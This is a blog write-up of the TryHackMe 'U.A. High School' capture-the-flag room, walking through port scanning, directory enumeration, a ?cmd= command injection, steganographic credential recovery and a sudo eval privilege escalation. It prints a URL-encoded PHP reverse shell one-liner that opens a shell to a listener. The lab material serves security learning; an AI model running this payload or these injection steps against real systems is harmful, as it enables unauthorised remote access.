U.A. High School THM Challenge Writeup

Nirmal SNirmal S
4 min read

Hello everyone, after a long time, I am writing this writeup on this CTF from TryHackMe.

Step 1: Port Scanning

Use nmap or rustscan to scan for open ports.

┌──(kali㉿kali)-[~]
└─$ nmap -sCV -Pn 10.10.191.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-14 09:39 EDT
Nmap scan report for 10.10.191.158
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:d0:45:7d:66:10:6f:f8:29:80:70:bb:b3:49:7e:aa (RSA)
|   256 2a:d2:b4:d8:ec:ba:b5:04:b7:58:b4:f1:80:10:24:96 (ECDSA)
|_  256 98:05:3f:ba:7c:52:42:50:ae:27:3a:8b:2c:8a:06:45 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: U.A. High School
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.55 seconds

Based on the scan, we can find the ports 22 and 80 are open. Open a web browser and see their webpage.

Step 2: Path and Subdomain Finding

Use tools like gobuster, dirb, dirbuster, ffuf, feroxbuster. I have used dirb to find the path easily and I found /assets/ path

──(kali㉿kali)-[~]
└─$ dirb http://10.10.191.158  

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun 14 09:42:23 2025
URL_BASE: http://10.10.191.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.191.158/ ----
==> DIRECTORY: http://10.10.191.158/assets/

Append the identified path with the IP and you will be displayed with a blank page.

So, copy the new path and use the path enumeration tools mentioned above to find other paths.

And so, I found a new file from the path named index.php.

┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
└─$ gobuster dir -u http://10.10.191.158/assets/ -w=/usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.191.158/assets/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/images               (Status: 301) [Size: 322] [--> http://10.10.191.158/assets/images/]
/index.php            (Status: 200) [Size: 0]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

And, as same as before, a Blank page is displayed. Again repeated the same process but no lead.

After few tries, I have an idea to add a command to the path like this and I have tried it.

?cmd=whoami/pwd/ls

Step 3: Getting Reverse Shell

Used a php reverse shell payload from revshell with a netcat listener to get back a reverse shell.

php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.10.10%22%2C9001%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

rlwrap nc -lvnp 1337

We got back the reverse shell.

Step 4: Finding Credentials

While moving backwards from the current directory, I found a directory in the /var/www/ directory which has a .txt file containing a base64 encoded password. Save the password.

I navigated to the /var/www/html/assets/images/ directory and found 2 image file. Downloaded it using wget and analyzed its file type and found one was not in the same format as mentioned extension.

www-data@ip-10-10-191-158:/var/www/html/assets/images$ ls
ls
oneforall.jpg  yuei.jpg

┌──(kali㉿kali)-[~]
└─$ file oneforall.jpg 
oneforall.jpg: data

Fix the issue using the hexeditor tool and change the format to JPG. Add the below text in the first line.

FF D8 FF E0 00 10 4A 46 49 46 00 01

Save the file and use steghide to extract credentials. For the passphrase, use the base64 encoded password.

steghide extract -sf <filename>

You can find the password for the user deku.

Step 5: User Flag

Using SSH, we can find the user.txt

ssh deku@<ip>

Step 6: Root flag

Run the below command to find root access files or directories

sudo -l

I have discovered an interesting directory, /opt/NewComponent, which contained a feedback.sh script. Upon reviewing the code, I noticed the use of the eval function, which can be exploited.

I ran the feedback.sh file with sudo permissions and injected the following payload to modify the /etc/sudoers file.

All the flag are found.

Key takeaways include:

  • Reverse Shell Connection: Successfully setting up a reverse shell with busybox netcat was crucial in gaining access to the target system.

  • File Analysis: Extracting and decoding hidden files from images highlighted the importance of thorough information gathering and file analysis.

  • Privilege Escalation: Identifying and exploiting the eval command in bash scripts demonstrated effective methods for privilege escalation.

Thank you.

Follow my socials:

https://www.linkedin.com/in/nirmal-s-738a60203/

0
Subscribe to my newsletter

Read articles from Nirmal S directly inside your inbox. Subscribe to the newsletter, and don't miss out.

THM writeupCTF Writeupthm

Written by

Nirmal S
Nirmal S